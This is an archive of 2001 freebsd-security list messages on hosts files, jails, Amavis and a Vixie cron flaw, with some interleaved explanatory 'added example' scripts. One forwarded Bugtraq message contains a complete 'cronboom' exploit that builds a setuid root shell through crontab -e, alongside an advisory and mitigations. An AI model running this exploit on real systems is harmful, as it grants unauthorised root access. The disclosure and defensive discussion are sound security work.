Date: Tue, 8 May 2001 11:31:25 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200105081531.LAA62449@khavrinen.lcs.mit.edu>
To: Sheldon Hearn
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: reverse or not
In-Reply-To: <98864.989254731@axl.fw.uunet.co.za>
References: <3AF6D34C.AE6A479F@globalstar.com> <98864.989254731@axl.fw.uunet.co.za>

< said:

> 2) Hosts should have hostnames for
> the loopback network
> hardwired into /etc/hosts.

Our policy here is just the opposite: hosts should not even have
`/etc/hosts' files, and should they by some twist of fate gain one,
the resolver should be configured to ignore it.

-GAWollman

From owner-freebsd-security Tue May 8 10:24:44 2001
Date: Tue, 08 May 2001 10:24:41 -0700
From: "Crist Clark"
Organization: Globalstar LP
To: Garrett Wollman
Cc: Sheldon Hearn, freebsd-security@FreeBSD.ORG
Subject: Re: reverse or not
Message-ID: <3AF82BD9.F474AFB6@globalstar.com>
References: <3AF6D34C.AE6A479F@globalstar.com> <98864.989254731@axl.fw.uunet.co.za> <200105081531.LAA62449@khavrinen.lcs.mit.edu>

Garrett Wollman wrote:
>
> < said:
>
> > 2) Hosts should have hostnames for the loopback network
> > hardwired into /etc/hosts.
>
> Our policy here is just the opposite: hosts should not even have
> `/etc/hosts' files, and should they by some twist of fate gain one,
> the resolver should be configured to ignore it.

Well, if you are talking about Athena, that computer environment is
fairly "unique" to say the least.
Kind of strange to have a pretty secure computing environment where
every person on the campus knows the root password to every public
workstation. (Unless things have changed.) It's an interesting
security model.
--
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above. If
the reader of this e-mail is not the intended recipient, or the employee
or agent responsible to deliver it to the intended recipient, you are
hereby notified that any review, dissemination, distribution or copying
of this communication is strictly prohibited. If you have received this
e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Tue May 8 10:59:03 2001
Date: Tue, 8 May 2001 18:16:51 +0200
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Problems with Amavis setup
Message-ID: <20010508181651.O253@speedy.gsinet>
References: <20010508094002.41629.qmail@web13802.mail.yahoo.com>
In-Reply-To:
  <20010508094002.41629.qmail@web13802.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 02:40:02AM -0700
Organization: System Defenestrators Inc.

On Tue, May 08, 2001 at 02:40 -0700, John Braun wrote:
>
> I can't download "file" command for "Amavis" from
>
> ftp://ftp.astron.com/pub/file/,
> ftp://ftp.gw.com/pub/unix/file/ and
> ftp://ftp.funet.fi/pub/unix/tools/file/.
>
> Where can I get this command ?

It comes with your system. It's already on your disk.

$ uname -sr
FreeBSD 4.2-STABLE
$ which file
/usr/bin/file
$ man file
...
"/brief"
OPTIONS
     -b      Do not prepend filenames to output lines (brief mode).
...
HISTORY
     There has been a file command in every UNIX since at least Research
     Version 6 (man page dated January, 1975). [ ... ]
...

BTW: You do use the security/amavis port, don't you?


virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.
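An added example, not from the thread and not part of Amavis or FreeBSD: a small sh wrapper that gives Amavis the brief output it expects from "file -b" on a FreeBSD 4.1 box whose file(1) predates the option. It uses the real flag when the installed file(1) accepts it and otherwise strips the exact "NAME: " prefix itself. FILE_CMD is an assumed environment knob; the demo file is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): emulate "file -b" (brief mode, no
# "NAME: " prefix) on a file(1) that lacks the option, such as the one in
# FreeBSD 4.1 discussed above.  The prefix is removed as an exact string
# ("NAME: "), not by cutting at the first colon, so a colon inside the
# filename cannot truncate the description.
# FILE_CMD is an assumed knob for pointing at a different file(1) binary.

FILE_CMD=${FILE_CMD:-/usr/bin/file}

# has_brief_flag -> exit 0 if "$FILE_CMD" accepts -b
has_brief_flag() {
    "$FILE_CMD" -b /dev/null >/dev/null 2>&1
}

# strip_prefix NAME LINE -> LINE without its leading "NAME: "
strip_prefix() {
    line=$2
    prefix="$1: "
    case $line in
        "$prefix"*) printf '%s\n' "${line#"$prefix"}" ;;
        *)          printf '%s\n' "$line" ;;   # unexpected shape: pass through
    esac
}

# file_brief PATH... -> one description line per argument, like "file -b"
file_brief() {
    if has_brief_flag; then
        "$FILE_CMD" -b -- "$@"
        return
    fi
    for f in "$@"; do
        strip_prefix "$f" "$("$FILE_CMD" -- "$f")"
    done
}

# Demo on a constructed temporary file (not data from the thread).
demo_file_brief() {
    tmp=$(mktemp) || return 1
    printf 'hello from amavis\n' > "$tmp"
    file_brief "$tmp"
    rm -f "$tmp"
}
demo_file_brief
```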
From owner-freebsd-security Tue May 8 11:13:22 2001
Date: Tue, 8 May 2001 20:13:07 +0200
From: Szilveszter Adam
To: security@freebsd.org
Subject: Fwd: Vixie cron vulnerability
Message-ID: <20010508201307.A2613@petra.hos.u-szeged.hu>

Hello,

I hate to disturb, but...

I cannot reproduce this, but... are we affected? This looks like rather
new...

----- Forwarded message from Cade Cairns -----

Date: Mon, 7 May 2001 16:08:49 -0600
Sender: Bugtraq List
From: Cade Cairns
Subject: Vixie cron vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings Bugtraqers,

Attached is a simple proof of concept for the vixie cron vulnerability
recently published in Debian Security Advisory DSA-054-1. The code was
written during SIA analysis of this vulnerability. Further information on
the vulnerability may be found in the SecurityFocus SIA commercial alert,
also attached to this message.
Cade Cairns
SecurityFocus
http://www.securityfocus.com/

#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
#   the crontab file maintenance program (crontab) fails to drop privileges
#   before invoking the editor under certain circumstances.
#
# description:
#   a serialization error exists in some versions of the file maintenance
#   program, crontab. the vulnerability was introduced in versions which
#   were patched for a separate vulnerability in fall of 2000 (see Bugtraq
#   ID #1960).
#
#   when a parsing error occurs after a modification operation, crontab will
#   fail to drop privileges correctly for subsequent modification operations.
#   because the program is installed setuid root, it may be possible for a
#   local user to gain root privileges.
#
# affected versions:
#   cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
#   note that copies of the program with the patch mentioned above are likely
#   to also be vulnerable.
#
# references:
#   http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
    echo "** unable to locate crontab executable, exiting"
    exit 1
fi

# header name restored here; the archive had eaten it as an HTML tag
cat > vcsh.c << EOF
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c

if ! test -x $PWD/vcsh; then
    echo "** compilation failed, exiting"
    exit 1
fi

echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
    chown root.root $PWD/vcsh
    chmod 4755 $PWD/vcsh
    rm $PWD/vcboom
else
    touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0


Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA)
Service. To manage account please visit https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.

---------------------------------------------------------------------------
Security Alert

Subject:         Vixie Cron crontab Privilege Lowering Failure Vulnerability
BUGTRAQ ID:      2687
CVE ID:          CVE-MAP-NOMATCH
Published:       May 07, 2001
Updated:         May 07, 2001
Remote:          No
Local:           Yes
Availability:    User Initiated
Authentication:  Not Required
Credibility:     Vendor Confirmed
Ease:            Exploit Available
Class:           Serialization Error
Impact:          10.00
Severity:        6.90
Urgency:         7.59
Last Change:     Initial analysis.
---------------------------------------------------------------------------

Vulnerable Systems:
  Paul Vixie Vixie Cron 3.0pl1
    + Debian Linux 2.2 sparc
    + Debian Linux 2.2 powerpc
    + Debian Linux 2.2 arm
    + Debian Linux 2.2 alpha
    + Debian Linux 2.2 68k
    + Debian Linux 2.2

Non-Vulnerable Systems:

Summary:
  Local users can cause Vixie crontab to fail to drop privileges when
  editing files. Can lead to full system compromise.

Impact:
  Local users can manipulate crontab's lowering of privileges, leading to
  full system compromise.

Technical Description:
  Vixie cron is an implementation of the popular UNIX program that runs
  user-specified programs at periodic scheduled times.
  A serialization error exists in some versions of the crontab file
  maintenance program. The vulnerability was introduced in versions which
  were patched for a separate vulnerability in fall of 2000 (see Bugtraq
  ID #1960).

  When a parsing error occurs after a modification operation, crontab will
  fail to drop privileges correctly for subsequent modification operations.
  Because the program is installed setuid root, it may be possible for a
  local user to gain root privileges.

Attack Scenarios:
  An attacker with local access must edit their crontab file and enter a
  line that causes the parser to fail. The attacker must then enter 'yes'
  when prompted as to whether he or she wishes to attempt to fix the error
  in the file. This will cause the editor to be invoked again, but with
  full privileges. The attacker could then execute arbitrary commands from
  the editor, or overwrite otherwise protected system files.

Exploits:
  During SIA analysis of this vulnerability, Cade Cairns wrote
  proof-of-concept exploit code.
  http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh

Mitigating Strategies:
  Restricting local access to the host may prevent unauthorized users from
  exploiting this vulnerability.

  Restrict access to the cron facility to trusted users via the
  /etc/cron.allow and /etc/cron.deny files (man crontab).
Solutions:
  For Paul Vixie Vixie Cron 3.0pl1:

  Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb
  Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb
  Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
    http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb
  Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
    http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb
  Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb
  Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
    http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb

Credit:
  Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7,
  2001.

References:
  advisory: Debian DSA-054-1: cron
  http://www.securityfocus.com/advisories/3282

ChangeLog:
  May 07, 2001: Initial analysis.

---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT

BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by
SecurityFocus.com.

CVE ID: This is a unique identifier assigned to the vulnerability by the CVE.

Published: The date the vulnerability was first made public.

Updated: The date the information was last updated.

Remote: Whether this is a remotely exploitable vulnerability.

Local: Whether this is a locally exploitable vulnerability.

Credibility: Describes how credible the information about the vulnerability
is. Possible values are:
  Conflicting Reports: There are multiple conflicting reports about the
  existence of the vulnerability.
  Single Source: There is a single non-reliable source reporting the
  existence of the vulnerability.
  Reliable Source: There is a single reliable source reporting the
  existence of the vulnerability.
  Conflicting Details: There is consensus on the existence of the
  vulnerability but not its details.
  Multiple Sources: There is consensus on the existence and details of the
  vulnerability.
  Vendor Confirmed: The vendor has confirmed the vulnerability.

Class: The class of vulnerability. Possible values are: Boundary Condition
Error, Access Validation Error, Origin Validation Error, Input Validation
Error, Failure to Handle Exceptional Conditions, Race Condition Error,
Serialization Error, Atomicity Error, Environment Error, and Configuration
Error.

Ease: Rates how easily the vulnerability can be exploited. Possible values
are: No Exploit Available, Exploit Available, and No Exploit Required.

Impact: Rates the impact of the vulnerability. Its range is 1 through 10.

Severity: Rates the severity of the vulnerability. Its range is 1 through
10. It's computed from the impact rating and remote flag. Remote
vulnerabilities with a high impact rating receive a high severity rating.
Local vulnerabilities with a low impact rating receive a low severity
rating.

Urgency: Rates how quickly you should take action to fix or mitigate the
vulnerability. Its range is 1 through 10. It's computed from the severity
rating, the ease rating, and the credibility rating. High severity
vulnerabilities with a high ease rating, and a high confidence rating have
a higher urgency rating. Low severity vulnerabilities with a low ease
rating, and a low confidence rating have a lower urgency rating.

Last Change: The last change made to the vulnerability information.

Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system components is vulnerable. For
example, Windows 98 ships with Internet Explorer.
So if a vulnerability is found in IE you may see something like:

  Microsoft Internet Explorer
    + Microsoft Windows 98

Non-Vulnerable Systems: The list of non-vulnerable systems.

Summary: A concise summary of the vulnerability.

Impact: The impact of the vulnerability.

Technical Description: The in-depth description of the vulnerability.

Attack Scenarios: Ways an attacker may make use of the vulnerability.

Exploits: Exploit instructions or programs.

Mitigating Strategies: Ways to mitigate the vulnerability.

Solutions: Solutions to the vulnerability.

Credit: Information about who disclosed the vulnerability.

References: Sources of information on the vulnerability.

Related Resources: Resources that might be of additional value.

ChangeLog: History of changes to the vulnerability record.

---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com

Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA)
Service. To manage your account please visit
https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
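The cron.allow / cron.deny mitigation named in the alert above, as an added example that is not part of the forwarded message, the advisory, or Vixie cron: an sh audit of which accounts may invoke the setuid crontab(1) under those two files, following the precedence crontab(1) documents (an allow file wins; a deny file is consulted only when no allow file exists; with neither, the build-time default decides). File paths and the "all"/"root" default are passed as arguments so it can run against copies or test files; the user names and passwd lines are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): evaluate the cron.allow / cron.deny
# policy the SIA alert recommends, so an admin can see who may reach the
# setuid crontab(1) on a host.  Semantics follow crontab(1):
#   - if ALLOW_FILE exists, only users listed in it may use crontab;
#   - else if DENY_FILE exists, every user *not* listed in it may;
#   - if neither exists the result is site-dependent (Vixie cron is built
#     for either "all users" or "root only"); the DEFAULT argument picks it.
# Paths are arguments so the check can run against another host's copied
# /etc or against test files without touching the real ones.

# listed USER FILE -> exit 0 if FILE has a line exactly equal to USER
listed() {
    grep -qxF -- "$1" "$2" 2>/dev/null
}

# cron_allowed USER ALLOW_FILE DENY_FILE DEFAULT
#   DEFAULT is "all" or "root"; prints "allow" or "deny", exits 0 or 1.
cron_allowed() {
    user=$1; allow=$2; deny=$3; default=${4:-all}
    if [ -f "$allow" ]; then
        if listed "$user" "$allow"; then echo allow; return 0; fi
        echo deny; return 1          # allow file present: unlisted = denied
    fi
    if [ -f "$deny" ]; then
        if listed "$user" "$deny"; then echo deny; return 1; fi
        echo allow; return 0         # deny file only: unlisted = allowed
    fi
    if [ "$default" = all ] || [ "$user" = root ]; then
        echo allow; return 0
    fi
    echo deny; return 1
}

# cron_report ALLOW_FILE DENY_FILE DEFAULT PASSWD_FILE
#   prints "<user> allow|deny" for every account in PASSWD_FILE
cron_report() {
    while IFS=: read -r name _rest; do
        case $name in ''|'#'*) continue ;; esac
        printf '%s %s\n' "$name" "$(cron_allowed "$name" "$1" "$2" "$3")"
    done < "$4"
}

# Demo on constructed files (not a real host's /etc): alice is allowed by
# cron.allow; bob and root are refused because an allow file is present,
# regardless of what cron.deny says.
demo_cron_audit() {
    d=$(mktemp -d) || return 1
    printf 'alice\n' > "$d/cron.allow"
    printf 'alice\nbob\n' > "$d/cron.deny"
    printf 'root:x:0:0::/root:/bin/sh\n' > "$d/passwd"
    printf 'alice:x:1001:1001::/home/alice:/bin/sh\n' >> "$d/passwd"
    printf 'bob:x:1002:1002::/home/bob:/bin/sh\n' >> "$d/passwd"
    cron_report "$d/cron.allow" "$d/cron.deny" all "$d/passwd"
    rm -rf "$d"
}
demo_cron_audit
```

On a live FreeBSD or Debian host the first three arguments would be /etc/cron.allow, /etc/cron.deny and the default the local cron was built with, and the fourth /etc/passwd.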
----- End forwarded message -----

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Tue May 8 11:16:42 2001
Date: Tue, 8 May 2001 20:09:36 +0200 (CEST)
From: Attila Nagy
Subject: Re: Jails and FreeBSD4.3
In-Reply-To: <20010507132904.E33043@moo.udder.org>
Message-ID: <20010508200734.B61277-100000@scribble.fsn.hu>

Hello,

> Yeah, it would be nice if you could bind the jail to a list of IPs
> or whatever. It seems like it would be the kind of functionality that
> would be desired by more people than just be. Right now, it's the
> only thing preventing me from moving anything over to a jail. Almost
> every service I run needs more than one IP. My $0.02.
I misunderstood the original question, I thought of a name based apache
vhost running on multiple IPs, not IP based vhosts...

--------------------------------------------------------------------------
Attila Nagy                                     e-mail: Attila.Nagy@fsn.hu
Budapest Polytechnic (BMF.HU)                   @work: +361 210 1415 (194)
H-1084 Budapest, Tavaszmezo u. 15-17.
                                                cell.: +3630 306 6758

From owner-freebsd-security Tue May 8 13:06:30 2001
Date: Tue, 8 May 2001 13:06:06 -0700
From: Greg Haa
To: "'freebsd-security@FreeBSD.ORG'"
Subject:
Message-ID: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING>

Hey all.

Can anyone tell me what this means?

May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2200): request too small
May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2201): request too small
May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2202): request too small

I have no idea if this is even the right list or if it is a security
problem.
TIA
greg

From owner-freebsd-security Tue May 8 14:40:27 2001
Date: Tue, 8 May 2001 14:40:20 -0700
From: Kris Kennaway
To: Szilveszter Adam
Cc: security@FreeBSD.ORG
Subject: Re: Fwd: Vixie cron vulnerability
Message-ID: <20010508144020.C2823@xor.obsecurity.org>
References: <20010508201307.A2613@petra.hos.u-szeged.hu>
In-Reply-To: <20010508201307.A2613@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Tue, May 08, 2001 at 08:13:07PM +0200

On Tue, May 08, 2001 at 08:13:07PM +0200, Szilveszter Adam wrote:
> Hello,
>
> I hate to disturb, but...
>
> I cannot reproduce this, but... are we affected? This looks like rather
> new...

I checked this when I first heard about it and we don't seem to be. I
don't even know where that version came from, it might be a
linux-originated thing.
Kris --dkEUBIird37B8yKS Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+GfEWry0BWjoQKURAsREAJ0ZRSF0gY/Fauz3ARbp2UeqSknSyACfasp7 PRg0d4PnEvWjbQ6MF53vowY= =emmR -----END PGP SIGNATURE----- --dkEUBIird37B8yKS-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 14:59:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 5EB8737B43C for ; Tue, 8 May 2001 14:59:11 -0700 (PDT) (envelope-from dave@moo.udder.org) Received: (from dave@localhost) by moo.udder.org id f48Lwks15578; Tue, 8 May 2001 14:58:46 -0700 (PDT) Date: Tue, 8 May 2001 14:58:46 -0700 From: Dave Whitaker To: Attila Nagy Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 Message-ID: <20010508145846.B74154@moo.udder.org> Mail-Followup-To: Attila Nagy , freebsd-security@freebsd.org References: <20010507132904.E33043@moo.udder.org> <20010508200734.B61277-100000@scribble.fsn.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508200734.B61277-100000@scribble.fsn.hu>; from bra@fsn.hu on Tue, May 08, 2001 at 08:09:36PM +0200 Organization: Quiknet Inc. Roseville, CA X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Atilla: I use Apache with mod_vhost_alias. I have two IPs bound for all of the regular sites, plus each SSL key I have requires its own IP. This immediately throws the use of jails away for now. However, I use the two IPs for mod_vhost_alias liek this: 1. point domain.com to one ip 2. point www.domain.com to another 3. 
Set two different VirtualDocumentRoots so that both www.domain.com and domain.com pull up the same site, i.e.:

VirtualDocumentRoot /rz/webs/%2.1/%2/public_html

will pull up www.domain.com, and

VirtualDocumentRoot /rz/webs/%1.1/%0/public_html

will pull up domain.com. The configuration makes the Apache config a lot cleaner, especially when hosting thousands of sites. You may be able to do this some other way, but that's what I'm doing now.

Regards, Dave

On Tue, May 08, 2001 at 08:09:36PM +0200, Attila Nagy wrote:
> Hello,
>
> > Yeah, it would be nice if you could bind the jail to a list of IPs
> > or whatever. It seems like it would be the kind of functionality that
> > would be desired by more people than just me. Right now, it's the
> > only thing preventing me from moving anything over to a jail. Almost
> > every service I run needs more than one IP. My $0.02.
> I misunderstood the original question, I thought of a name based apache
> vhost running on multiple IPs, not IP based vhosts...
>
> --------------------------------------------------------------------------
> Attila Nagy e-mail: Attila.Nagy@fsn.hu
> Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194)
> H-1084 Budapest, Tavaszmezo u. 15-17.
> cell.: +3630 306 6758

From owner-freebsd-security Tue May 8 15: 4:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.serv.u-szeged.hu (sol.serv.u-szeged.hu [160.114.51.3]) by hub.freebsd.org (Postfix) with ESMTP id 6622337B423 for ; Tue, 8 May 2001 15:04:07 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.serv.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id AAA15542; Wed, 9 May 2001 00:04:05 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14xFaQ-0002XN-00 for ; Wed, 09 May 2001 00:04:06 +0200 Date: Wed, 9 May 2001 00:04:06 +0200 From: Szilveszter Adam To: security@FreeBSD.ORG Subject: Re: Fwd: Vixie cron vulnerability Message-ID: <20010509000406.C7798@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , security@FreeBSD.ORG References: <20010508201307.A2613@petra.hos.u-szeged.hu> <20010508144020.C2823@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508144020.C2823@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 08, 2001 at 02:40:20PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, May 08, 2001 at 02:40:20PM -0700, Kris Kennaway wrote:
> On Tue, May 08, 2001 at 08:13:07PM +0200, Szilveszter Adam wrote:
> > Hello,
> >
> > I hate to disturb, but...
> >
> > I cannot reproduce this, but... are we affected? This looks like rather
> > new...
>
> I checked this when I first heard about it and we don't seem to be. I
> don't even know where that version came from, it might be a
> linux-originated thing.
> > Kris

Well the version is surely Debian: p1 stands for patchlevel 1, I guess. The crontab on one of our Linux boxen was already updated and it produced exactly the same result as the one on -CURRENT: a shell wrapper suid me :-) Cool. Maybe you (Kris) should inform BUGTRAQ that we are (as usual) exempt from the excitement that running vulnerable systems entails...

On a semi-related note: I found no good way of finding out what version of cron we have. Last time when there was an exploit I had to check ident(1) lines IIRC. Does any of you know of a better way?

-- Regards: Szilveszter ADAM Szeged University Szeged Hungary

From owner-freebsd-security Tue May 8 18: 2:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from softweyr.com (mail.dobox.com [208.187.122.44]) by hub.freebsd.org (Postfix) with ESMTP id 25E2237B422 for ; Tue, 8 May 2001 18:02:30 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=025f3eed5c4fc085f0fb64df616aaf9d) by softweyr.com with esmtp (Exim 3.16 #1) id 14xIN9-0000LH-00; Tue, 08 May 2001 19:02:35 -0600 Message-ID: <3AF8972B.BD18C1E7@softweyr.com> Date: Tue, 08 May 2001 19:02:35 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Crist Clark Cc: freebsd-security@FreeBSD.ORG Subject: Re: reverse or not References: <3AF6E858.77E9B72A@globalstar.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Crist Clark wrote:
>
> Wes Peters wrote:
> >
> > Sheldon Hearn scribed:
> > >
> > > That's not what I'm suggesting. People were talking about /etc/hosts vs
> > > DNS. I'm saying that
> > >
> > > 1) DNS servers shouldn't answer questions about the loopback
> > > network.
> > >
> > > 2) Hosts should have hostnames for the loopback network
> > > hardwired into /etc/hosts.
> >
> > 3) /etc/host.conf should always have hosts listed before
> > bind, to be sure that you get your local definitions
> > *first*.
>
> I was thinking of applications like sendmail(8) that don't bother with
> the local resolver and really like to go straight to DNS.

Netscape. Grrrr.

-- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Tue May 8 20:54:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BA51D37B422 for ; Tue, 8 May 2001 20:54:09 -0700 (PDT) (envelope-from robert@fledge.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f493s4f79948; Tue, 8 May 2001 23:54:04 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 8 May 2001 23:54:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Dave Whitaker Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 In-Reply-To: <20010507121223.C33043@moo.udder.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 7 May 2001, Dave Whitaker wrote:
> I recently installed FreeBSD 4.3, specifically wanting to mess with
> jails. Everything appears to work fine, except I use apache with
> mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I
> need to get the jail to bind to many IPs, rather than just one. Is
> there any way to do this, or would anyone be willing to provide me with
> a patch to do so?
I've already responded to this to some extent by private e-mail, but since I just caught up with it on the security mailing list, I'll give a quick response here also.

Right now, the jail() code in FreeBSD 4.3-STABLE supports binding only a single IP address to a jail. This was by design, as Poul-Henning points out. Due to the way in which jail IP address scoping is performed, there are actually several limitations to removing this restriction, although with some caveats, it can be done with a pretty small patch. The difficulty in removing the limit lies in that jail does not truly polyinstantiate the IP address/port namespace, it merely scopes and modifies the socket calls made by processes in a jail. In particular, it blocks the ability to bind an IP address not associated with the jail, and it performs a conversion of 127.0.0.1 as the target address to the IP associated with the jail. Similarly, if INADDR_ANY is requested as the source address, the jail code forcibly selects the jail IP as the source address, instead of using routing information. You'll notice that some applications expecting to use 127.0.0.1 in specific ways will fail as a result of this behavior.

When moving to multiple IP addresses on a jail, an additional inconsistency is introduced: the process is not permitted to use INADDR_ANY since there isn't true polyinstantiation, leaving few useful choices for wildcard sockets. In the multiple IP code I'm working with right now, the practical implication is that processes attempting to bind all IPs using INADDR_ANY in fact bind only the first IP. For applications carefully selecting their IP, such as Apache running with virtual domains and specifically bound IPs, this is not a problem. For others, such as inetd, it may mean that only the first IP gets these services.

As has been discussed, I'm in the process of implementing a "jailNG" that changes some of the underlying model assumptions of the jail code.
These changes are targeted only at 5.0-CURRENT right now, as a primary concern in writing the code has been to migrate to a model that provides compatibility with the SMPng code, and hence support for fine-grained synchronization primitives. Right now, I have no plans to backport the code to the RELENG_4 branch, as it deprecates the existing jail() system call, thus breaking the ABI (which is generally a no-no on a minor release branch). This is because the management model is modified such that jails are now explicitly created, joined, and destroyed, as they have unique jail "names". This allows jails to be individually managed using the jail.instance.(name).* sysctl namespace, which was an important goal of the new implementation. The existing jail(8) code uses implicit naming, provides no fine-grained management, but does offer automatic garbage collection when the last process in a jail dies.

I've posted some initial jailNG patches to http://www.watson.org/~robert/jailng/. I have additional support code going into the tree shortly that permits per-jail securelevels, and once the support code is in the base tree, I'll update jailNG to handle that.

I'm of mixed feelings about adding multiple-IP support to the code: it is very much in demand, but further reduces compatibility (broken INADDR_ANY), and introduces a harder optimization problem (scaling to 10,000 IPs per-jail is not as easy as scaling to two). While it is theoretically possible to backport the changes to RELENG_4 (and not very hard at that), and I might even be willing to do that (probably as a for-pay thing since I don't see it as a priority), I think the chances of it making its way into the tree before 5.0-RELEASE are highly unlikely, due to ABI/API changes, etc.
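The address scoping Robert Watson describes above (bind to a foreign address refused, 127.0.0.1 rewritten to the jail address, INADDR_ANY replaced by the jail address rather than left to routing, and, with the multiple-IP patch, INADDR_ANY collapsing to the first address) written out as a small user-space model so the cases can be checked by hand. This is an example added to this page for illustration; it is not Robert Watson's patch and not the kernel's own prison code. The jail name "www", the two 192.0.2.x addresses and the 198.51.100.1 foreign address are made up (RFC 5737 documentation ranges), and a two-address jail stands in for the multiple-IP code he mentions.

```c
/*
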